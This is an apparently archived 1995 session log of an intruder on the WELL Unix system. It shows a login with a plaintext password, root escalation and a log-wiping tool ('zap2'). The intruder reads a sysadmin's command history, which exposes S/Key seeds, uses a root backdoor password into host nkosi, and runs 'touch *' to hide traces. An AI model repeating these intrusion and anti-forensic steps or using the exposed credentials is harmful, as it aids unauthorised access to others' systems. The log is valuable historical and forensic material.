Kevin On Demand
- Who Or What Tipped Him Off? - kevin-on-demand.takedown.com 4027
- Start: 1995 Feb 14 13:56:34
- Total Run Time: 3:08
- From netcom4.netcom.com to well.sf.ca.us.
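- About 8 hours before his arrest. Something has tipped him off about the Well, and he immediately heads for the files of the chief sysadmin, Pei (in the log below, apparently the hpc home directory, where he reads .history). He then checks whether nkosi still has his back door (the root telnet login to nkosi near the end of the log).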
UNIX(r) System V Release 4.0 (well)
This is the WELL
Type newuser to sign up.
Type trouble if you are having trouble logging in.
Type guest to learn about the WELL.
If you already have a WELL account, type your username.
login: dono
Password: no,panix
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**As of 1/30/95 Default prompts on the WELL changed. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
well% newgrp -hack root
# ./zap2 dono
Zap2!
# ls
0108.gz hc11 newoki.tar.Z satan.tar.Z zap.c
4004 itool ns.c sendmail.tar.Z zap2
asm11 key2.zip nw.tar.Z sportd zap2.c
cloak kocher.tar.Z o.tar.Z sum zipcrack.zip
cloak.c log1 okitsu.tar.Z time zipcrypt.zip
cust.out.Z log2 oldctek.tar.Z unxor.c zipstuff.tar.Z
g.c mconnect.c oldnw.tar.Z zap
# csh
well# find . -exec chown dono {} \; &
[1] 175
well# grep hpc: /etc/passwd
well# cd /home/h/p/hpc
well# ls -tla | head
total 864
-rw------- 1 hpc staff 8444 Feb 14 13:58 .inbox
-rw------- 1 hpc well 3799 Feb 14 13:42 .history
drwxr-xr-x 17 hpc well 1536 Feb 14 13:41 .
-rw------- 1 hpc staff 1048 Feb 14 13:41 .Xauthority
-r-------- 1 hpc staff 44 Feb 14 13:41 .xsun.develop:0
drwx------ 3 hpc well 1536 Feb 13 21:30 Mail
drwx------ 2 hpc well 512 Feb 13 13:36 misc
-rw-r--r-- 1 hpc well 2929 Feb 13 08:35 ref
drwx------ 6 hpc well 512 Feb 9 02:49 src
[1] + Done find . -exec chown dono {} ;
well# cat .history
finger katz
exit
netstat -rn
stty erase ^?
csh
exit
setenv TERM vt100
csh
exit
csh
exit
csh
exit
csh
exit
df
df
cd /var
l
ls -la
du *
l
du adm audit cron local log lp preserve saf spool statmon uucp yp
l
cd
df
cd /var
l
cd
elm
elm
elm
elm
elm
csh
exit
su
exit
uptime
df
csh
exit
w
uptime
df
setenv TERM vt100
csh
exit
talk jpettitt
elm
df
uptime
l
top
su
exit
uptime
df
top
w
exit
csh
exit
pwd
cd /etc/rcS.d
l
cd
diff S30rootusr.sh /etc/rcS.d/S30rootusr.sh
diff S40standardmounts.sh /etc/rcS.d/S40standardmounts.sh
diff S50drvconfig /etc/rcS.d/S50drvconfig
diff S60devlinks /etc/rcS.d/S60devlinks
diff S70buildmnttab.sh /etc/rcS.d/S70buildmnttab.sh
diff rcS /etc/rcS
su
su
su
su
exit
elm
elm
elm
elm
elm
elm
ls -la /usr/bin/stty
elm
exit
man getpid
su - sysadmin
su - sysadmin
su - sysadmin
id
exit
grep sysadmin /etc/passwd
su
cd /usr/local/sysadmin/bin
l
./keyinit
ls -la
su
l
su
./keyinit sysroot
ls -la
su
more /etc/vfstab
more /etc/skeykeys
ls -la /etc/ske
ls -la /etc/skey
ls -la /etc/skeykeys
su
su
cd
su - sysadmin
su
su - sysadmin
su sysroot
ping ftp.uu.net
traceroute netcom.com
telnet cardio.ucsf.edu
exit
portuse -h
tail -f /var/adm/messages
more /etc/hosts
l
su sysr
su sysroot
su sysroot
exit
set path = ( $path /usr/local/sysadmin/bin )
key
key 69 de96199
su admroot
elm
exit
last.sun -f /var/log/ascend.wtmp | more
w
csh
exit
su sysroot
exit
uptime
csh
exit
login
telnet well
exit
openwin
exit
elm
exit
elm
finger katz
l
vi tk
csh
elm
elm
csh
exit
csh
exit
csh
exit
exit
last.sun -f /var/log/ascend.wtmp
wtmptoa /var/log/ascend.wtmp | more
exit
csh
exit
key 67 nk139000
clear
l
uptime
top
exit
elm
l
finger katz
l
exit
csh
exit
csh
exit
csh
exit
ping owl.ucsf.edu
telnet owl.ucsf.edu
ping cgl
ping cgl.ucsf.edu
telnet
exit
csh
exit
csh
exit
csh
l
exit
csh
exit
csh
exit
su sysroot
su sysroot
su - sysadmin
top
su admroot
su - sysadmin
uptime
elm
id
finger @neon.cchem.berkeley.edu
pwd
finger @neon.cchem.berkeley.edu
telnet opus.sdsc.edu
finger @neon.cchem.berkeley.edu
finger @neon.cchem.berkeley.edu
finger @neon.cchem.berkeley.edu
exit
ping well
exit
grep mgraham /etc/passwd
top
su admroot
key 8 de96199
key 8 de96199
elm
finger tpesce
finger btanaka
last scott
last dono
elm
elm
key 7 de96199
clear
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
exit
su - sysadmin
key -1 de961900
key -n -1 de961900
key 98 de961901
elm
exit
su - sysadmin
exit
elm
su admroot
exit
su - sysadmin
openwin
exit
su - sysadmin
su admroot
well# telent
telent: Command not found
well# telnet
telnet> open nkosi
Trying 198.93.4.11 ...
Connected to nkosi.
Escape character is '^]'.
SunOS UNIX (nkosi)
login: root
Password: .hackman
Last login: Wed Dec 31 16:00:00 from
SunOS Release 4.1.3_U1 (AT) #1: Tue May 24 15:46:24 PDT 1994
nkosi# ^D
logout
Connection closed by foreign host.
well# pwd
/home/h/p/hpc
well# pwd
/home/h/p/hpc
well# cd
well# cd
well# ls -tla
total 56708
drwxr-xr-x 4 dono well 2048 Feb 14 13:56 .
drw-r--r-- 2 dono well 512 Feb 14 13:56 hc11
-rwx------ 1 dono well 15284 Feb 13 16:52 sportd
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
-rw-rw-rw- 1 dono well 310707 Feb 11 22:13 satan.tar.Z
-rwxrwxrwx 1 dono well 314800 Feb 7 22:45 asm11
-rw-rw-rw- 1 dono well 18680 Feb 7 13:33 g.c
-rw------- 1 dono well 15631 Feb 5 23:02 .inbox
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
-rw-rw-rw- 1 dono well 451297 Feb 5 00:12 cust.out.Z
-rw-r--r-- 1 dono other 999242 Feb 1 14:51 okitsu.tar.Z
-rw-r--r-- 1 dono other 1440017 Feb 1 14:51 newoki.tar.Z
-rw-rw-rw- 1 dono well 260032 Jan 29 20:10 sendmail.tar.Z
-rw-rw-rw- 1 dono well 2900 Jan 29 19:46 mconnect.c
-rw-r--r-- 1 dono well 0 Jan 26 18:02 .news_time
-rw-r--r-- 1 dono well 2255535 Jan 8 20:34 0108.gz
-rw------- 1 dono other 60 Dec 31 12:21 .rnlast
-rw------- 1 dono other 25 Dec 31 12:21 .newsrc
-rw------- 1 dono other 6 Dec 31 12:21 .rnlock
-rw-r--r-- 1 dono well 4076 Dec 31 00:21 cloak.c
-rw-r--r-- 1 dono well 16384 Dec 30 23:52 cloak
-rw-r--r-- 1 dono well 24576 Dec 28 10:33 log2
-rw-r--r-- 1 dono well 16384 Dec 15 23:29 sum
-rw-r--r-- 1 dono well 16384 Dec 15 23:02 zap
-rw-r--r-- 1 dono well 16384 Dec 15 23:02 time
-rw-r--r-- 1 dono well 24576 Dec 11 20:48 log1
-rw-r--r-- 1 dono well 13228 Dec 10 00:26 ns.c
-rw-r--r-- 1 dono well 637827 Dec 7 00:50 4004
-rw-r--r-- 1 dono well 257615 Dec 6 06:38 oldnw.tar.Z
-rw-r--r-- 1 dono well 184864 Dec 6 06:38 oldctek.tar.Z
-rw-r--r-- 1 dono well 8142621 Dec 5 04:26 nw.tar.Z
-rw-r--r-- 1 dono well 6813202 Dec 5 03:48 o.tar.Z
-rw-r--r-- 1 dono well 1755 Nov 29 22:13 zap.c
-rw-rw-rw- 1 dono well 59953 Nov 29 00:50 .lock
-rwxrwxrwx 1 dono well 10112 Nov 26 13:25 zap2
-rw-r--r-- 1 dono well 3390 Nov 26 13:25 zap2.c
-rw-r--r-- 1 dono well 50599 Nov 23 21:53 key2.zip
-rw-r--r-- 1 dono well 48786 Nov 23 01:33 zipcrypt.zip
-rw-r--r-- 1 dono well 136912 Nov 23 01:33 zipcrack.zip
-rw-r--r-- 1 dono well 297223 Nov 22 01:55 zipstuff.tar.Z
-rw-r--r-- 1 dono well 5947301 Nov 22 01:53 kocher.tar.Z
-rw-r--r-- 1 dono well 150 Oct 27 11:37 unxor.c
-rw-rw-rw- 1 dono well 43385 Oct 23 18:18 .record
-rw-r--r-- 1 dono well 11 Jun 12 1992 .cflist
-rw-r--r-- 1 dono well 139 Jun 12 1992 .plan
well# touch *